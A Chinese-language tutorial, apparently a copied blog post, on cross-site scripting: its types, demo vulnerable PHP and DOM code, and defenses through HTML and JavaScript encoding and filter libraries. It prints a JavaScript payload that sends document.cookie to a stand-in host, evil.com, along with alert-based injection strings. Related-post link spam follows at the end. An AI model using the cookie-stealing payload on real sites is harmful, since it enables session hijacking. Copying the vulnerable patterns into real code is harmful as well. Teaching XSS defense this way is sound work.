记录如何防止跨站点脚本攻击之抄写
一.简介
跨站点脚本(XSS)是当前web应用中最危险和最普遍的漏洞之一。安全研究人员在大部分最受欢迎的网站,包括Google, Facebook, Amazon, PayPal等网站都发现这个漏洞。如果你密切关注bug赏金计划,会发现报道最多的问题属于XSS。为了避免跨站脚本,浏览器也有自己的过滤器,但安全研究人员总是能够设法绕过这些过滤器。
这种漏洞(XSS)通常用于发动cookie窃取、恶意软件传播(蠕虫攻击),会话劫持,恶意重定向。在这种攻击中,攻击者将恶意JavaScript代码注入到网站页面中,这样“受害”者的浏览器就会执行攻击者编写的恶意脚本。这种漏洞容易找到,但很难修补。这就是为什么你可以在任何网站发现它的身影。
二.跨站点脚本是什么?
跨站点脚本攻击是一种Web应用程序的攻击,攻击者尝试注入恶意脚本代码到受信任的网站上执行恶意操作。在跨站点脚本攻击中,恶意代码在受影响用户的浏览器端执行,并对用户的影响。也被称为XSS攻击。对于广大的web程序猿来说。在网页设计中,我们已经把级联样式表叫做CSS。因此为了避免混淆,我们把cross-site scripting成为XSS.
这个漏洞发生在网站应用程序接受用户的输入数据却没有做必要的编码。如果对用户输入的数据没有进行正确的编码和过滤,这个被注入恶意脚本将被发送给其他用户。浏览器会正常地把这个脚本当成普通脚本执行,这个时候恶意的操作就不可避免的发生了。大部分的时候,XSS是用来窃取cookie,或窃取有效用户的会话令牌session,以此进行会话劫持。
三.XSS的演示
Example 1:
几乎所有的网站上看到一个搜索框。有了这个搜索框,你可以搜索并找到在网站上存放的资料。这种搜索形式看起来像这样:
<form action="search.php" method="get"><input type="text" name="q" value="" /><input type="submit" value="send" />
</form>
在search.php页面中,代码显示了搜索的结果,并且列出了用户输入的搜索关键字。形式如下:"Search results for Keyword" 或者"You Searched for Keyword"
search.php可以这么写来模拟功能:
<h3>You Searched for: <?php echo($_GET['q']); ?>
无论你输入任何关键字,它将随搜索结果一起被显示在网页上。如果一个攻击者师徒从这个地方注入以下恶意脚本。
<script>alert('XSS injection')</script>
可以看到,因为缺少对用户输入的有效的"编码"和"过滤"。导致了XSS攻击的发生,其实从本质上理解,XSS就是一种HTML的注入,和传统的buffer overflow是类似的思想。即没有对数据和代码进行有效的分离,在缓冲区溢出,攻击者在通过超长的数据包发送覆盖了程序buffer的关键返回ret位置,导致CPU控制流的劫持,错误地把攻击者数据当做代码来执行,最后导致了缓冲区溢出。
而XSS中的HTML注入也是一种利用代码和数据未有效分离的攻击,只不过攻击发生在受害者用户的浏览器上,攻击者将数据发送给服务器,服务器没有对输入的数据进行有效的"编码"和"过滤"(即去除数据本身的代码特性,对于HTML来说就是去除它们称为Tag标签的可能),导致了这些数据在用户浏览器上得到执行,最终导致XSS攻击的发生。
Example 2:
很多网站都有私信或者留言板功能。登录用户可以发表评论或者给其他用户(包括管理员)发送私信。一个最简单的模拟表单如下:
<form action="sendmessage.php" method="post"><textarea name="message"> </textarea><input type="submit" value="send" />
</form>
当用户点击发送时,这条消息会被保存在数据库中指定的数据表中,另一个用户当打开这条消息的时候将看到发送的内容。但是,如果一个恶意攻击者发送的内容包含了一些javascript代码,这些代码用于偷取敏感的cookie信息。当用户打开看到这条消息的时候,恶意的javascript代码就会得到执行,造成敏感cookie信息泄露。攻击者可以利用获得这些cookie信息进行session hijacking会话劫持,直接以合法用户的身份登录其他用户的账户。
恶意攻击者可以在消息框中加入一下javascript代码:
var url = "http://www.evil.com/index.php"; //攻击者控制的服务器
var postStr = "ck=" + document.cookie;
var ajax = null;
if(window.XMLHttpRequest())
{ajax = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{ajax = new ActiveXObject("Microsoft.XMLHttp");
}
else
{return;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);
ajax.onreadystatechange = function()
{if(ajax.readyState == 4 && ajax.status == 200){//alert("Done!");}
}
通过AJAX异步请求,将被攻击者的敏感cookie信息发送给了攻击者控制的服务器。攻击者随后即可利用这些cookie信息以"合法"用户的身份进行登录操作。
先了解一下几个问题:
1.cookie的作用
Cookie,有时也用其复数形式Cookies,指某些网站为了辨别用户身份、进行session跟踪而储存在用户本地终端上的数据(通常经过加密)。定义于RFC2109(已废弃),最新取代的规范是RFC2965。
也就是说,cookie是用户和服务器之间的桥梁。服务器可以使用session来保存用户的身份信息(ID,购物车等),但是需要用户在访问网页(发送HTTP数据包)的时候附带上相应的cookie,通过cookie中的特定值来识别sessionID,才能把单独用户和单独的session练习起来。cookie是有状态HTTP交互的一种重要机制。
2.浏览器的同源策略
在进行cookie窃取的时候,攻击者偷取的cookie是什么,是全部cookie,还是当前这个网站的cookie?
同源策略,它是由Netscape提出的一个著名的安全策略。现在所有支持JavaScript的浏览器都会使用这个策略。所谓同源是指,域名,协议,端口相同。当一个浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的,即检查是否同源,只有和百度同源的脚本才会被执行。
浏览器的同源策略限制了来自不同源的"document"或脚本,对当前"document"的读取或者设置了某些属性。为了不让浏览器的页面行为发生混乱,浏览器提出了"Origin"(源)这一概念,来自不同的Origin的对象无法互相干扰。
因为同源策略的原因,也就导致了我们的XSS Payload(XSS攻击代码)必须在我们希望攻击的同一个域下触发。
四、XSS攻击的种类
业界普遍将XSS攻击分为三类:反射型XSS(non-persisitent XSS),存储型XSS(persistent XSS),DOM Based XSS
4.1 非持久性跨站点脚本攻击
非持久性XSS也称为反射型跨站漏洞。它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。
4.2 持久的跨站点脚本攻击
持久型跨站点脚本也称为存储跨站点脚本。它一般发生在XSS攻击向量 (一般指XSS攻击代码)存储在网站数据库,当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面,查看内容时脚本将自动执行。
4.3 基于dom的跨站点脚本攻击
基于DOM的XSS有时也称为type0 XSS。当用户能够通过交互修改浏览器页面中的DOM(Document Object Model)并显示在浏览器上时,就有可能产生这种漏洞,从效果上来看它也是反射型XSS。通过修改页面的DOM节点形成的XSS,称之为DOM Based XSS。
<script>function test(){var str = document.getElementById("text").value;document.getElementById("t").innetHTML = "<a href='" + str + "' >testLink</a>";}
</script>
<div id="t"></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" οnclick="test()" />
在这个场景中,代码修改了页面的DOM节点,通过innerHTML把一段用户数据当做HTML写入页面中,这就造成了DOM Based XSS
' οnclick=alert(/xss/) '
输入后,页面代码就变成了:
<a href='' οnclick=alert(/xss/) '' >testLink</a>
点击这个新生成的链接,脚本将被执行。
实际上,这里还有另外一种利用方式--除了构造一个新事件外,还可以选择闭合掉<a>标签,并插入一个新的HTML标签:
<a href=''><img src=# οnerrοr=alert(/xss2/) /><'' >testLink</a>
五、XSS漏洞产生的原因
跨站点脚本的主要原因是程序猿对用户的信任。另一个原因是,这种攻击有许多变体,用制造出一种行之有效的XSS过滤器是一件比较困难的事情。但是这只是相对的,对用户输入数据的"编码"和"过滤"在任何时候都是很重要的,我们必须采取一些针对性的手段对其进行防御。
六、如何创造一个良好的XSS过滤器来阻止大多数XSS攻击代码
6.1 需要重点"编码"和"过滤"的对象
The URL
HTTP referer objects
GET parameters from a form
POST parameters from a form
Window.location
Document.referer
document.location
document.URL
document.URLUnencoded
cookie data
headers data
database data
防御XSS有一个原则:
以当前的应用系统为中心,所有的进入应用系统的数据都看成是输入数据(包括从FORM表单或者从数据库获取到的数据),所有从当前应用系统流出的数据都看作是输出(包括输出到用户浏览器或向数据库写入数据)
对输入的数据进行"过滤",对输入数据进行"编码"。这里的"编码"也要注意,必须针对数据具体的上下文语境进行针对性的编码。例如数据是输出到HTML中的那就要进行HtmlEncode,如果数据时输出到javascript代码中进行拼接的,那就要进行javascriptEncode。
如果不搞清楚数据具体输出的语境,就有可能因为HtmlParser()和javaescriptParser()两种解析引擎的执行先后问题导致看似严密的“编码”形同虚设。
6.2 HtmlEncode HTML编码
它的作用是将字符转换成HTMLEntities,对应的标准是ISO-8859-1
为了对抗XSS,在HtmlEncode中要求至少转换一下字符:
& --> &
< --> <
> --> >
" --> "
' --> '
/ --> /
在PHP中:
htmlentities http://www.w3school.com.cn/php/func_string_htmlentities.asp
htmlspecialchars http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp
6.3 javascriptEncode javascript "编码"
javascriptEncode和HtmlEncode的编码方法不同,HtmlEncode是去编码,而javascriptEncode更多的像转义,它需要使用"\"对特殊字符进行转义。从原理上来讲,这都符合编码函数的一个大原则:将数据和代码区分开,因为对于HTML Tag来说,我们对其进行"可视化(转换成可以见字符)"的编码可以将数据和HTML的界限分开。而对于javascript来说,我们除了要进行编码之外,还需要对特殊字符进行转义,这样共计输入的用于"闭合"的特殊字符就无法发挥作用,从而避免XSS攻击,除此之外,在对抗XSS时,还要求输出的变量必须在引号内部,以避免造成安全问题。
escape() http://www.w3school.com.cn/js/jsref_escape.asp
该方法不会对ASCII字母和数字进行编码,也不会对下面这些ASCII标点符号进行编码: * @ -_ + . /。其他所有的字符都会被转义序列(十六进制\xHH)替换。利用这个编码函数,不仅能防御XSS攻击,还可以防御一些command注入。
七、一些开源的防御XSS攻击的代码库
PHP AntiXSS
这是一个不错的PHP库,可以帮助开发人员增加一层保护,防止跨站脚本漏洞。https://code.google.com/p/php-antixss/xss_clean.php filterhttps://gist.github.com/mbijon/1098477HTML Purifier http://htmlpurifier.org/xssprotect https://code.google.com/p/xssprotect/XSS HTML Filter
http://finn-no.github.io/xss-html-filter/
记录如何防止跨站点脚本攻击之抄写相关推荐
- 安全编码实践之二:跨站点脚本攻击防御
安全编码实践之二:跨站点脚本攻击防御 声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用. 文章来源:https://medium.com/bugbountywriteup/how-to-w ...
- ASP.NET Core中的OWASP Top 10 十大风险-跨站点脚本攻击 (XSS)
本博文翻译自: https://dotnetcoretutorials.com/2017/10/25/owasp-top-10-asp-net-core-cross-site-scripting-xs ...
- 基于IE的MIME sniffing功能的跨站点脚本攻击
IE有一个特性,那就是在将一个文件展示给用户之前会首先检查文件的类型,这乍看起来并没什么问题,但实际上这是相当危险的,因为这会允许IE执行图片中的代码,即嵌入在一个图像中的JavaScript代码.引 ...
- 如何防止跨站点脚本攻击
1. 简介 跨站点脚本(XSS)是当前web应用中最危险和最普遍的漏洞之一.安全研究人员在大部分最受欢迎的网站,包括Google, Facebook, Amazon, PayPal等网站都发现这个漏洞 ...
- 使用AntiXss.HtmlEncode方法来防止跨站点脚本攻击,后解码
使用AntiXss.HtmlEncode方法来防止跨站点脚本攻击中文会被转码, 可使用Sanitizer.GetSafeHtmlFragment(string inpu)方法来进行解码. 转码: 解码 ...
- 防止跨站点脚本注入_防止跨站点脚本攻击
防止跨站点脚本注入 大多数现有的浏览器都能够解释和执行脚本,这些脚本以诸如JavaScript,JScript,VBScript之类的脚本语言创建,并嵌入在从Web服务器下载的网页中. 当攻击者将恶意 ...
- 如何尽量规避XSS(跨站点脚本)攻击
2019独角兽企业重金招聘Python工程师标准>>> 跨站攻击,即Cross Site Script Execution(通常简写为XSS,因为CSS与层叠样式表同名,故改为XSS ...
- 如何防止跨站点脚本 (XSS) 攻击完整指南
跨站点脚本 (XSS) 攻击的完整指南.如何防止它以及 XSS 测试. 跨站点脚本 (XSS) 是每个高级测试人员都知道的最流行和易受攻击的攻击之一.它被认为是对 Web 应用程序最危险的攻击之一,也 ...
- 跨站点脚本 (XSS)
跨站点脚本 (XSS) 跨站点脚本 (XSS) 是客户端代码注入攻击.攻击者旨在通过在合法的网页或 Web 应用程序中包含恶意代码,在受害者的 Web 浏览器中执行恶意脚本.当受害者访问执行恶意代码的 ...
最新文章
- AI自动评审论文,CMU这个工具可行吗?
- 牛客寒假6-B.煤气灶
- Silverlight与HTML双向交互
- JavaScript判断浏览器类型及版本(新增谷歌的Chrome)
- Google AdSense广告被屏蔽
- 标图123123666
- Mycat监控_监控平台安装Mycat-web_作为配置中心注册发现用---MyCat分布式数据库集群架构工作笔记0037
- jQuery关于复制(复制隐藏文字+显示文字)跳转,Clipboard
- CPU 架构 —— ARM 架构
- IDEA插件: 一键自动部署jar到远程服务器 使用 Cloud Toolkit 来部署应用到腾讯云、阿里云服务器
- 圆周率小数点后1千位(附计算圆周率源代码)
- linux驱动篇-touchscreen-精简版
- 机械工程学专业词汇英语翻译
- 【问链财经-区块链基础知识系列】 第四十五课 一文读懂保理业务的操作流程
- 2020牛客寒假算法基础集训营3 B	牛牛的DRB迷宫II二进制详解
- C语言习题练习2——被5整除问题
- 响铃:只做“连接器”,企业微信如何实现“人即服务”
- 乐理基础知识-1.节奏
- 计算机打印时颜色怎么加深,喷墨打印机部分颜色加深怎么办
- 反弹Shell命令一键生成工具
热门文章
- Flink专题-Source
- 数字签名、数字证书、对称加密算法、非对称加密算法、单向加密(散列算法)——Web网络系列学习笔记
- ArrayList各方法的时间复杂度
- 中文编程语言_文言文编程语言,让你明白什么叫“中文比英语还难”。
- python工具栏消失_[Python自学] PyQT5-菜单栏、工具栏、状态栏
- c语言链表萌新,萌新一枚,关于链表问题求大佬解答
- java servlet 多线程_java – 多线程GAE servlet来处理并发用户
- flask创建mysql表_MySQL表不是使用Flask和PyMySQL创建的
- android中判断sim卡状态和读取联系人资料的方法
- task文件服务器无法输入,Win10系统无法启动task scheduler服务的解决方法